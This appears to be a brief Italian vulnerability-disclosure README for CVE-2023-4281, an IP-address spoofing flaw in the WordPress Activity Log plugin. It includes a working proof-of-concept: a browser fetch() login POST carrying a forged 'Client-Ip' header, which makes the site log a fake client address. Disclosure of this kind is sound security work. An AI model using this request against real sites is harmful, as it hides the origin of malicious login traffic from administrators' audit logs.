
Repository per la vulnerabilità CVE-2023-4281.
ID CVE: CVE-2023-4281
Tipo di vulnerabilità: Spoofing dell'indirizzo IP
Descrizione: Il plugin Activity Log recupera gli indirizzi IP dei client da intestazioni potenzialmente non affidabili, consentendo a un attaccante di manipolarne il valore. Questo può essere usato per nascondere l'origine del traffico dannoso.
Passaggi per riprodurre:
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Riferimenti: